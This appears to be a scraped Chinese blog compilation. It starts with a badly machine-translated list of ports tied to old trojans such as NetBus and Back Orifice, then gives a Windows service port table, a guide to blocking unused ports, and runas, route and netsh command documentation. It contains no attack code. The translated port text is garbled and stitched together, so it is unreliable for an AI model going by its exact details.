Description: Trojan ICQTrojan open this port. .
Port: 5000, 5001, 5321, 50505.
Services: [NULL]. .
Description: Trojans blazer5 open port 5000. Trojans open Sockets de Troie 5000, 5001, 5321, 50505 port.
Ports: 5400,5401,5402. .
Services: [NULL].
Description: Blade Runner Trojan open this port. .
Port: 5550.
Services: [NULL]. .
Description: Trojans open this port xtcp.
Port: 5569. .
Services: [NULL].
Description: Trojan Robo-Hack open this port. .
Port: 5632.
Services: pcAnywere. .
Description: sometimes you will see a lot of this port scan, depending on user location. When the user opens the pcAnywere, it automatically scans C class network LAN to find possible agent (the agent here refers to the agent instead of the proxy). Intruders will find open this type of service the computer. , So you should review the scan of the source address. Some search pcAnywere scan packages often contain port 22 of UDP packets.
Port: 5742. .
Services: [NULL].
Description: Trojan WinCrash1. .03 Open this port. .
Port: 6267.
Services: [NULL]. .
Description: a wide open outside girl horse in this port.
Port: 6400. .
Services: [NULL].
Description: Trojan The tHing open this port. .
Port: 6670, 6671.
Services: [NULL]. .
Description: Deep Throat open Trojan ports 6670. While Deep Throat opening 3. .0 6671 port.
Port: 6883. .
Services: [NULL].
Description: Trojan DeltaSource open this port. .
Port: 6969.
Services: [NULL]. .
Description: Trojans Gatecrasher, Priority and opening this port.
Port: 6970. .
Services: RealAudio.
Description: RealAudio client from the server's UDP ports 6970-7170 to receive audio data stream. This is TCP-7070 control port outgoing connection settings. .
Port: 7000.
Services: [NULL]. .
Description: Grab the Trojans open this port on the Remote.
Ports: 7300,7301,7306,7307,7308. .
Services: [NULL].
Description: Trojan NetMonitor open this port. In addition NetSpy1. .0 Also open 7306 port. .
Port: 7323.
Services: [NULL]. .
Description: Sygate server-side.
Port: 7626. .
Services: [NULL].
Description: Trojan Giscier open this port. .
Port: 7789.
Services: [NULL]. .
Description: Trojans open this port ICKiller.
Port: 8000. .
Services: OICQ.
Description: Tencent QQ server-side open this port. .
Port: 8010.
Services: Wingate. .
Description: Wingate proxy open this port.
Port: 8080. .
Services: the proxy port.
Description: WWW proxy open this port. .
Port: 9400, 9401, 9402.
Services: [NULL]. .
Port: 9872,9873,9874,9875,10067,10167. .
Services: [NULL].
Description: Portal of Doom Trojan horse open this port. .
Port: 9989.
Services: [NULL]. .
Description: Trojans iNi-Killer open this port.
Port: 11000. .
Services: [NULL].
Description: Trojan SennaSpy open this port. .
Port: 11223.
Services: [NULL]. .
Description: Progenic trojan horse open this port.
Port: 12076,61466. .
Services: [NULL].
Description: Trojan Telecommando open this port. .
Port: 12223.
Services: [NULL]. .
Description: KeyLogger Trojan Hack ' 99 open this port.
Port: 12345,12346. .
Services: [NULL].
Description: Trojan NetBus1. .60 / 1. .70, GabanBus open this port. .
Port: 12361.
Services: [NULL]. .
Description: Trojans Whack-a-mole open this port.
Port: 13223. .
Services: PowWow.
Description: PowWow is a Tribal Voice chat program. It allows users to open a private chat at this port connection. The procedure for establishing connections very aggressive. It will be stationed in the TCP port and other responses. Heartbeat interval caused a similar connection requests. If a dial-up users to chat from the hands of another inherited the IP address can occur if there are many different people to test the port situation. This protocol uses OPNG as its connection request the first 4 bytes. .
Port: 16969.
Services: [NULL]. .
Description: Trojans open this port Priority.
Port: 17027. .
Services: Conducent.
Description: This is an outward connection. This is because the company was installed with Conducent "adbot" shareware. Conducent "adbot" is to share the software displays advertising services. Using this service a popular software Pkware. .
Port: 19191.
Services: [NULL]. .
Description: a Trojan horse blue flame open this port.
Port: 20000,20001. .
Services: [NULL].
Description: Trojan Millennium open this port. .
Port: 20034.
Services: [NULL]. .
Description: Trojan NetBus Pro open this port.
Port: 21554. .
Services: [NULL].
Description: Trojan GirlFriend open this port. .
Port: 22222.
Services: [NULL]. .
Description: Trojans open this port Prosiak.
Port: 23456. .
Services: [NULL].
Description: Trojan Evil FTP, Ugly FTP open this port. .
Port: 26274, 47262.
Services: [NULL]. .
Description: Trojans open this port Delta.
Port: 27374. .
Services: [NULL].
Description: Trojan Subseven 2. .1 Open this port. .
Port: 30100.
Services: [NULL]. .
Description: Trojans open this port NetSphere.
Port: 30303. .
Services: [NULL].
Description: Trojan Socket23 open this port. .
Port: 30999.
Services: [NULL]. .
Description: Trojans open this port Kuang.
Port: 31337,31338. .
Services: [NULL].
Description: Trojan BO (Back Orifice) open this port. Another Trojan DeepBO also open port 31338. .
Port: 31339.
Services: [NULL]. .
Description: Trojans NetSpy DK open this port.
Port: 31666. .
Services: [NULL].
Description: Trojan BOWhack open this port. .
Port: 33333.
Services: [NULL]. .
Description: Trojans open this port Prosiak.
Port: 34324. .
Services: [NULL].
Description: Trojan Tiny Telnet Server, BigGluck, TN open this port. .
Port: 40412.
Services: [NULL]. .
Description: a Trojan horse The Spy open this port.
Ports: 40421,40422,40423,40426,. .
Services: [NULL].
Description: Trojan Masters Paradise open this port. .
Port: 43210, 54321.
Services: [NULL]. .
Description: Trojans SchoolBus 1. .0 .0/2. open this port.
Port: 44445. .
Services: [NULL].
Description: Trojan Happypig open this port. .
Port: 50766.
Services: [NULL]. .
Description: Trojans open this port to Fore.
Port: 53001. .
Services: [NULL].
Description: Remote Windows Shutdown Trojan open this port. .
Port: 65000.
Services: [NULL]. .
Description: Trojans Devil 1. .03 open this port.
P> Here is: The system commonly used ports. .
7 UDP Echo 简单 TCP/IP 服务
9 TCP Discard 简单 TCP/IP 服务
9 UDP Discard 简单 TCP/IP 服务
13 TCP Daytime 简单 TCP/IP 服务
13 UDP Daytime 简单 TCP/IP 服务
17 TCP Quotd 简单 TCP/IP 服务
17 UDP Quotd 简单 TCP/IP 服务
19 TCP Chargen 简单 TCP/IP 服务
19 UDP Chargen 简单 TCP/IP 服务
20 TCP FTP 默认数据 FTP 发布服务
21 TCP FTP 控制 FTP 发布服务
21 TCP FTP 控制 应用层网关服务
23 TCP Telnet Telnet
25 TCP SMTP 简单邮件传输协议
25 UDP SMTP 简单邮件传输协议
25 TCP SMTP Exchange Server
25 UDP SMTP Exchange Server
42 TCP WINS 复制 Windows Internet 名称服务
42 UDP WINS 复制 Windows Internet 名称服务
53 TCP DNS DNS 服务器
53 UDP DNS DNS 服务器
53 TCP DNS Internet 连接_blank"> 防火墙/Internet 连接共享
53 UDP DNS Internet 连接_blank"> 防火墙/Internet 连接共享
67 UDP DHCP 服务器 DHCP 服务器
67 UDP DHCP 服务器 Internet 连接_blank"> 防火墙/Internet 连接共享
69 UDP TFTP 普通 FTP 后台程序服务
80 TCP HTTP Windows 媒体服务
80 TCP HTTP 万维网发布服务
80 TCP HTTP SharePoint Portal Server
88 TCP Kerberos Kerberos 密钥分发中心
88 UDP Kerberos Kerberos 密钥分发中心
102 TCP X.400 Microsoft Exchange MTA 堆栈
110 TCP POP3 Microsoft POP3 服务
110 TCP POP3 Exchange Server
119 TCP NNTP 网络新闻传输协议
123 UDP NTP Windows Time
123 UDP SNTP Windows Time
135 TCP RPC 消息队列
135 TCP RPC 远程过程调用
135 TCP RPC Exchange Server
137 TCP NetBIOS 名称解析 计算机浏览器
137 UDP NetBIOS 名称解析 计算机浏览器
137 TCP NetBIOS 名称解析 Server
137 UDP NetBIOS 名称解析 Server
137 TCP NetBIOS 名称解析 Windows Internet 名称服务
137 UDP NetBIOS 名称解析 Windows Internet 名称服务
137 TCP NetBIOS 名称解析 Net Logon
137 UDP NetBIOS 名称解析 Net Logon
137 TCP NetBIOS 名称解析 Systems Management Server 2.0
137 UDP NetBIOS 名称解析 Systems Management Server 2.0
138 UDP NetBIOS 数据报服务 计算机浏览器
138 UDP NetBIOS 数据报服务 信使
138 UDP NetBIOS 数据报服务 服务器
138 UDP NetBIOS 数据报服务 Net Logon
138 UDP NetBIOS 数据报服务 分布式文件系统
138 UDP NetBIOS 数据报服务 Systems Management Server 2.0
138 UDP NetBIOS 数据报服务 许可证记录服务
139 TCP NetBIOS 会话服务 计算机浏览器
139 TCP NetBIOS 会话服务 传真服务
139 TCP NetBIOS 会话服务 性能日志和警报
139 TCP NetBIOS 会话服务 后台打印程序
139 TCP NetBIOS 会话服务 服务器
139 TCP NetBIOS 会话服务 Net Logon
139 TCP NetBIOS 会话服务 远程过程调用定位器
139 TCP NetBIOS 会话服务 分布式文件系统
139 TCP NetBIOS 会话服务 Systems Management Server 2.0
139 TCP NetBIOS 会话服务 许可证记录服务
143 TCP IMAP Exchange Server
161 UDP SNMP SNMP 服务
162 UDP SNMP 陷阱出站 SNMP 陷阱服务
389 TCP LDAP 服务器 本地安全机构
389 UDP LDAP 服务器 本地安全机构
389 TCP LDAP 服务器 分布式文件系统
389 UDP LDAP 服务器 分布式文件系统
443 TCP HTTPS HTTP SSL
443 TCP HTTPS 万维网发布服务
443 TCP HTTPS SharePoint Portal Server
445 TCP SMB 传真服务
445 UDP SMB 传真服务
445 TCP SMB 后台打印程序
445 UDP SMB 后台打印程序
445 TCP SMB 服务器
445 UDP SMB 服务器
445 TCP SMB 远程过程调用定位器
445 UDP SMB 远程过程调用定位器
445 TCP SMB 分布式文件系统
445 UDP SMB 分布式文件系统
445 TCP SMB 许可证记录服务
445 UDP SMB 许可证记录服务
500 UDP IPSec ISAKMP IPSec 服务
515 TCP LPD TCP/IP 打印服务器
548 TCP Macintosh 文件服务器 Macintosh 文件服务器
554 TCP RTSP Windows 媒体服务
563 TCP NNTP over SSL 网络新闻传输协议
593 TCP RPC over HTTP 远程过程调用
593 TCP RPC over HTTP Exchange Server
636 TCP LDAP SSL 本地安全机构
636 UDP LDAP SSL 本地安全机构
993 TCP IMAP over SSL Exchange Server
995 TCP POP3 over SSL Exchange Server
1270 TCP MOM-Encrypted Microsoft Operations Manager 2000
1433 TCP SQL over TCP Microsoft SQL Server
1433 TCP SQL over TCP MSSQL$UDDI
1434 UDP SQL Probe Microsoft SQL Server
1434 UDP SQL Probe MSSQL$UDDI
1645 UDP 旧式 RADIUS Internet 身份验证服务
1646 UDP 旧式 RADIUS Internet 身份验证服务
1701 UDP L2TP 路由和远程访问
1723 TCP PPTP 路由和远程访问
1755 TCP MMS Windows 媒体服务
1755 UDP MMS Windows 媒体服务
1801 TCP MSMQ 消息队列
1801 UDP MSMQ 消息队列
1812 UDP RADIUS 身份验证 Internet 身份验证服务
1813 UDP RADIUS 计帐 Internet 身份验证服务
1900 UDP SSDP SSDP 发现服务
2101 TCP MSMQ-DC 消息队列
2103 TCP MSMQ-RPC 消息队列
2105 TCP MSMQ-RPC 消息队列
2107 TCP MSMQ-Mgmt 消息队列
2393 TCP OLAP Services 7.0 SQL Server:下层 OLAP 客户端支持
2394 TCP OLAP Services 7.0 SQL Server:下层 OLAP 客户端支持
2460 UDP MS Theater Windows 媒体服务
2535 UDP MADCAP DHCP 服务器
2701 TCP SMS 远程控制(控件) SMS 远程控制代理
2701 UDP SMS 远程控制(控件) SMS 远程控制代理
2702 TCP SMS 远程控制(数据) SMS 远程控制代理
2702 UDP SMS 远程控制(数据) SMS 远程控制代理
2703 TCP SMS 远程聊天 SMS 远程控制代理
2703 UPD SMS 远程聊天 SMS 远程控制代理
2704 TCP SMS 远程文件传输 SMS 远程控制代理
2704 UDP SMS 远程文件传输 SMS 远程控制代理
2725 TCP SQL 分析服务 SQL 分析服务器
2869 TCP UPNP 通用即插即用设备主机
2869 TCP SSDP 事件通知 SSDP 发现服务
3268 TCP 全局编录服务器 本地安全机构
3269 TCP 全局编录服务器 本地安全机构
3343 UDP 集群服务 集群服务
3389 TCP 终端服务 NetMeeting 远程桌面共享
3389 TCP 终端服务 终端服务
3527 UDP MSMQ-Ping 消息队列
4011 UDP BINL 远程安装
4500 UDP NAT-T 路由和远程访问
5000 TCP SSDP 旧事件通知 SSDP 发现服务
5004 UDP RTP Windows 媒体服务
5005 UDP RTCP Windows 媒体服务
42424 TCP ASP.Net 会话状态 ASP.NET 状态服务
51515 TCP MOM-Clear Microsoft Operations Manager 2000
二、 关闭端口
限制端口防非法入侵[分享]
一般来说,我们采用一些功能强大的反黑软件和防火墙来保证我们的系统安全,本文拟用一种简易的办法——通过限制端口来帮助大家防止非法入侵。
非法入侵的方式
简单说来,非法入侵的方式可粗略分为4种:
1、扫描端口,通过已知的系统Bug攻入主机。
2、种植木马,利用木马开辟的后门进入主机。
3、采用数据溢出的手段,迫使主机提供后门进入主机。
4、利用某些软件设计的漏洞,直接或间接控制主机。
非法入侵的主要方式是前两种,尤其是利用一些流行的黑客工具,通过第一种方式攻击主机的情况最多、也最普遍;而对后两种方式来说,只有一些手段高超的黑客才利用,波及面并不广泛,而且只要这两种问题一出现,软件服务商很快就会提供补丁,及时修复系统。
因此,如果能限制前两种非法入侵方式,就能有效防止利用黑客工具的非法入侵。而且前两种非法入侵方式有一个共同点,就是通过端口进入主机。
端口就像一所房子(服务器)的几个门一样,不同的门通向不同的房间(服务器提供的不同服务)。我们常用的FTP默认端口为21,而WWW网页一般默认端口是80。但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务,比如139等;还有一些木马程序,比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。那么,只要我们把自己用不到的端口全部封锁起来,不就杜绝了这两种非法入侵吗?
限制端口的方法
对于个人用户来说,您可以限制所有的端口,因为您根本不必让您的机器对外提供任何服务;而对于对外提供网络服务的服务器,我们需把必须利用的端口(比如WWW端口80、FTP端口21、邮件服务端口25、110等)开放,其他的端口则全部关闭。
这里,对于采用Windows 2000或者Windows XP的用户来说,不需要安装任何其他软件,可以利用“TCP/IP筛选”功能限制服务器的端口。具体设置如下:
1、右键点击“网上邻居”,选择“属性”,然后双击“本地连接”(如果是拨号上网用户,选择“我的连接”图标),弹出“本地连接状态”对话框。
2、点击[属性]按钮,弹出“本地连接 属性”,选择“此连接使用下列项目”中的“Internet协议(TCP/IP)”,然后点击[属性]按钮。
3、在弹出的“Internet协议(TCP/IP)”对话框中点击[高级]按钮。在弹出的“高级TCP/IP 设置”中,选择“选项”标签,选中“TCP/IP筛选”,然后点击[属性]按钮。
4、在弹出的“TCP/IP筛选”对话框里选择“启用TCP/IP筛选”的复选框,然后把左边“TCP端口”上的“只允许”选上。
这样,您就可以来自己添加或删除您的TCP或UDP或IP的各种端口了。
添加或者删除完毕,重新启动机器以后,您的服务器就被保护起来了。
最后,提醒个人用户,如果您只上网浏览的话,可以不添加任何端口。但是要利用一些网络联络工具,比如OICQ的话,就要把“4000”这个端口打开,同理,如果发现某个常用的网络工具不能起作用的时候,请搞清它在您主机所开的端口,然后在“TCP /IP“里把此端口打开
21:00:57 | 添加评论 | 固定链接 | 引用通告 (0) | 写入日志 | 网络应用
网络术语2
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/useromainName\AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及“控制面板”项。作为另一组(例如“Users”或“Power Users”组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或“控制面板”项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、“控制面板”项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或“控制面板”项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如“打印机”文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在“计算机管理”中单击“服务和应用程序”,然后单击“服务”。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入:
runas /user:localmachinename\administrator cmd
系统提示时,键入管理员密码。
要使用名为 companydomain\domainadmin 的域管理员帐户启动“计算机管理”管理单元实例,请键入:
runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"
当提示时,键入帐户密码。
要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动“记事本”实例,请键入:
runas /user:user@domain.microsoft.com "notepad my_file.txt"
当提示时,键入帐户密码。
要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入:
runas /netonly /user:domain\username "command"
domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。
Route
在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。
语法
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]
参数
-f
清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。
-p
与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。
Command
指定要运行的命令。下表列出了有效的命令。 命令 目的
add 添加路由
change 更改现存路由
delete 删除路由
print 打印路由
Destination
指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。
mask subnetmask
指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。
Gateway
指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。
metric Metric
为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。
if Interface
指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。
/?
在命令提示符显示帮助。
注释
路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。
如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过“域名系统” (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。
如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如, 10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。
使用了无效的目标和子网掩码(网掩码)值的组合,会显示“Route:bad gateway address netmask”错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。
只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 IP 路由表的完整内容,请键入:
route print
要显示 IP 路由表中以 10. 开始的路由,请键入:
route print 10.*
要添加默认网关地址为 192.168.12.1 的默认路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入:
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.41.0.0 mask 255.255.0.0
要删除 IP 路由表中以 10. 开始的所有路由,请键入:
route delete 10.*
要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入:
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
怎样在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server
在命令行下更改ip地址
Windows2000是现在比较流行的操作系统,它的功能是很强大的,它甚至可以象Unix一样在命令行下做很多的工作。下面一种在命令行下更改ip地址的方法,现介绍给大家(括号里是一些注释,黑体字是人工录入的):
C:\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.1.1.94 (本地连接更改之前的ip)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.1.1.254
C:\>netsh (进入设置模式)
netsh>interface
interface>ip
interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
上文中的set命令具体解释如下:
set address - 设置指定的接口的 IP 地址和默认网关。
set dns - 设置 DNS 服务器模式和地址。
set wins - 设置 WINS 服务器模式和地址。
C:\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功)
2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.1.1.111
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.1.1.254
命令一览
.. - 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
commit - 提交在脱机模式中所做的更改。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump - 显示一个配置脚本。
exec - 运行一个脚本文件。
exit - 退出程序。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
offline - 将当前模式设置成脱机。
online - 将当前模式设置成联机。
popd - 从堆栈上打开一个上下文。
pushd - 将当前上下文放推入堆栈。
quit - 退出程序。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
unalias - 删除一个别名。
wins - 更改到 `wins' 上下文。
route 的命令
routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。
routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。
routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。
routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。
routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。
routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。
routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。
routing ip add/delete/set/show scope 添加、删除或显示多播作用域。
routing ip set/show loglevel 配置或显示全局 IP 记录等级。
routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。
routing ip show protocol 显示所有正在运行的 IP 路由协议。
routing ip show mfe 显示多播转发项。
routing ip show mfestats 显示多播转发项统计。
routing ip show boundarystats 显示 IP 多播边界。
routing ip show rtmdestinations 显示路由表管理器路由表中的目标。
routing ip show rtmroutes 显示路由表管理器路由表中的路由。
routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。
routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。
routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。
routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。
routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。
routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。
routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。
routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。
routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。
routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。
routing ip igmp set/show global 配置或显示 IGMP 全局设置。
routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。
routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。
routing ip igmp show grouptable 显示 IGMP 主机组表。
routing ip igmp show ifstats 显示每个接口的 IGMP 统计。
routing ip igmp show iftable 显示每个接口的 IGMP 主机组。
routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。
routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。
routing ip ospf set/show global 配置或显示全局 OSPF 设置。
routing ip ospf add/delete/set/show i
Windows
nterface 在指定接口上添加、删除、配置或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置“DHCP 中继代理程序”的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置“DHCP 中继代理程序”设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的“DHCP 中继代理程序”配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统计。
routing ip rip set/show global 配置 IP 的 RIP 全局设置。
routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。
routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。
routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。
routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。
routing ip rip show globalstats 显示全局 RIP 参数。
routing ip rip show ifbinding 显示接口的 IP 地址绑定。
routing ip rip show ifstats 显示每个接口的 RIP 统计。
IPX netsh 路由命令
routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。
routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。
routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。
routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口上配置 IPX 设置。
routing ipx set global 配置全局 IPX 路由设置。
routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。
routing ipx rip set global 配置全局 IPX 的 RIP 设置。
routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。
routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。
routing ipx sap set global 配置全局 IPX 的 SAP 设置。
routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。
routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表中。
routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置。
WINS NetSh 命令
list 列出所有可用的 WINS 命令。
dump 将 WINS 服务器配置转储到命令输出。
add name 在服务器上注册名称。详细信息,请输入 add name /?
add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /?
add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输入 add pngserver /?
check database 检查数据库的一致性。详细信息,请输入 check database /?
check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name /?
check version 检查版本号的一致性。详细信息,请输入 check version /?
delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name /?
